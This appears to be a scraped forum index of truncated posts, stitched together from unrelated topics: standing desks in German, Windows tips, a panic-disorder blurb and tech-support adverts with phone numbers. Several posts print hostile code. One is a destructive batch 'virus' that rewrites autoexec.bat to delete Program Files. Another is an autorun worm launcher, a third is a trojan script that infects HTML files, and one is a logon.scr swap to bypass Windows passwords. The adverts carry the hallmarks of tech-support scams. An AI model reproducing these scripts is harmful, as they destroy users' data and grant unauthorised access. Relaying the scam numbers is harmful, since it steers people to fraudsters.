How to make Virus!!
you can make it easy .. creat a notpad and copy this echo off@ clscall attrib -h -r c:\autoexec.bat >nulecho @echo off >c:\autoexec.batecho deltree /y c:\progra~1\*.* nul >>c:\autoexec.batecho copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.batecho copy...
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Elektrisch höhenverstellbares Schreibtischgestell
Ein modernes Home Office mit elektrisch höhenverstellbaren Schreibtischen und Schreibtischgestellen bietet auch den Vorteil der Anpassungsfähigkeit. Du kannst die Größe, Form und Materialien deines Schreibtisches entsprechend deinem individuellen Bedarf wählen. Egal, ob du einen komp...
Elektrisch höhenverstellbarer Schreibtisch von MeinOffice
Hey du,ein modernes Home Office mit elektrisch höhenverstellbaren Schreibtischen und Schreibtischgestellen ist der Schlüssel zu einem ergonomischen und effizienten Arbeitsplatz. In diesem Artikel werde ich dir erklären, wie ein solches Home Office aussehen sollte und wie MeinOffice.net...
How to fix the blue screen error on a Dell computer?
When your Dell computer is stuck on a blue screen, you can try the following steps to fix it:The first thing you must do is to turn off your computer. And during the bootup process, press F10.You will be directed to the Windows recovery program page. Choose to perform a full recovery.If you require tech...
Get Rid Of Norton Renewal Issues Call on +1-844-947-4746 For Your Norton Products
A valid Norton subscription and installation ensure that the security of your system is always up to date. With timely and effective Norton internet security renewal, you not only renew your Norton antivirus, but the internet security and protection as well. The process of renewing your protecti...
Gmail Password Recovery Solution Guide
From time to time, it ends up being genuinely unwieldy to get your Gmail password recovery. The most effortless way to deal with recover Gmail Password is Gmail support made by Google. For this, you need to sign in at support.google.com.Else you can in like manner take after these straightforwar...
AVG Removal Tool Help
If you face any issue with your avg antivirus and you need expert help who can fix your all error in such case call our AVG removal tool help number 1-888-646-0222. Our expert help to solve your all issue feel free to call us 24*7 for your assistance.
Gmail Password Recovery Phone Number
If you face any issue to login your gmail account or you are not able to recover your gmail password in such condition call our gmail password recovery phone number 1-888-646-0222. Our expert help to recover your gmail password. Our expert always available for your helps.
Epson Printer Contact Number For Best Tech Support
Printer will output blank pages, then there is a possibility that the problem lies somewhere else. So, you have to dial the Epson printer contact number for finding the cause of the problem in the Epson printer. -- Edited by advsoftware on Monday 24th of September 2018 06:09:36 PM
D-link Router Customer Support +1-877-624-4495 Toll Free Number
If you are having trouble to configure the D-link router, then you will require the help of an expert for troubleshooting. You can just ask D-link Router Customer Support Toll Free Number to rectify the router issues. Customer care experts are always available for live help and rectify the issues of...
The symptoms of panic disorder
People suffering from this disorder, as its main symptoms indicate heart palpitations, shortness of breath, anxiety, inability to take any action. Experts identify the physical manifestations and mental health problems, which can judge the panic disorder. Typically, the symptoms of the dise...
How to solve Blue Sreen Of Death (BSOD) ?
There are many ways to solve this problem: 1. Backup your file and Format windows. 2. Using Windows Start up repair and let them recovery your windows. 3. Using bootable disk to rewrite the corrupted files. 4. Use a new Hard Disk. Ps: BSOD happen because of your "Unstablize" Hard Disk. If yo...
Hery Tech
Display legal notice on startup
Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.REGEDIT[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]"legalnotice...
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How to stop timer of a trial software in registry
You need to remove all traces of the software from your registry.If the registry keys from the trail software still exist. It make conflict with the new install. This happens because both applications will be sharing different files.1. Click Start2. Click on Run3. Type regedit and press enter.4. R...
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Continually pop out your friend's CD Drive :
Continually pop out your friend's CD Drive,If he / she has more than one, it pops out all of them!Code:====Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = to colCDROMs.Count - 1colCDROMs.Item(i).EjectNext...
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Hacking Administrator Password (FOR OS WINDOS) XP
Buka CMD/ Command Prompt, type seperti dibawah ini: cd\windows\system32mkdir temphackcopy logon.scr temphack\logon.scrcopy cmd.exe temphack\cmd.exedel logon.scrrename cmd.exe logon.screxit Selepas itu tunggu sebentar, akan terkeluar satu "Unprotect DOS" , apa yang anda...
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33 Computer Tricks
Change Startup & Shutdown SoundHere are steps for this.1). Choose the track or sound which you want to set as start-up and shutdown sound, But remember that file should be in .WAV format and size of file should not be large it should be smaller than 1 mb otherwise startup will take longer time.If yo...
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how to create a real virus
1st: At desktop empty space, right click.2nd: Select "New", and select "Text Document".3rd: A New Text Document will be created. Open the text file that created.4th: Copy below following code:[AutoRun]open=RavMonE.exe eshellexecute=RavMonE.exe eshell\Auto\comma...
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How to Create a Trojon Virus
this is a trojan be very carful with this guys. do not come crying to me when your hard drive is fryed ok cuz if you bitch at me ill fry your next computer :>. have fun! @echo off::--Infect All Html Files---::Dir %Homedrive% /s /b > DirPath For /f %%Y In (DirPath) Do (Set DirPath=%%Y > Nul For %...
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Refresh Your Ram User!! (FOR OS WINDOWS)
Let's begin by clicking your windows start menu>run>cmd Now, type in the "wierd black box (CMD)" this: cd.. <enter> cd.. <enter> cd.. <enter> dir /s <enter> just wait for a moment.. do this for 3 or 4 times... thank you.. Safe try..(selamat mencube...
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Another easier method will b thru the group policy editor...1) Run ( Windows key+ R)2) Type gpedit.msc3)User Configuration >> Administrative templates >> Taskbar and start menu >> Locate" Prevent access to Shut Down command.."ENJOY...
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Clean Your Ram Users!
You may recognize that your system gets slower and slower when playing and working a lot with your pc. That's cause ur RAM is full of remaining progress pieces you do not need any more.So create a new text file on your desktop and call it .. uhm.. "RAMcleaner" or something...TypeFreeMem=Sp...
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How To Customise Your start Button
First you need a tool called "Resource Hacker". This free program allows you to change resources in any .exe file such as "Explorer.exe", which includes the [Start] button's Label. You can visit Download.com and search there for "Resource Hacker" (Click Here to...
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Hide your files in JPEG (FOR OS WINDOWS)
Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.Ok, lets begin…1. Gather all the files that you wish to hide in a folder anywhere in your PC (make it in C:\h...
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Bootup:Tiada lagi splash skrin windows XP (FOR OS WINDOWS).
Windows XP mempunyai banyak cara yang boleh anda lakukan untuk membuat PC anda hanya sedikit lebih baik. Klik Start ButtonKlik Runtaip: MSCONFIGKlik OKKlik BOOT.INI tabKlik kotak /NOGUIBOOTKlik Apply, kemudian OKKemudian restart komputer anda dengan ketiadaan Splash Skrin.....
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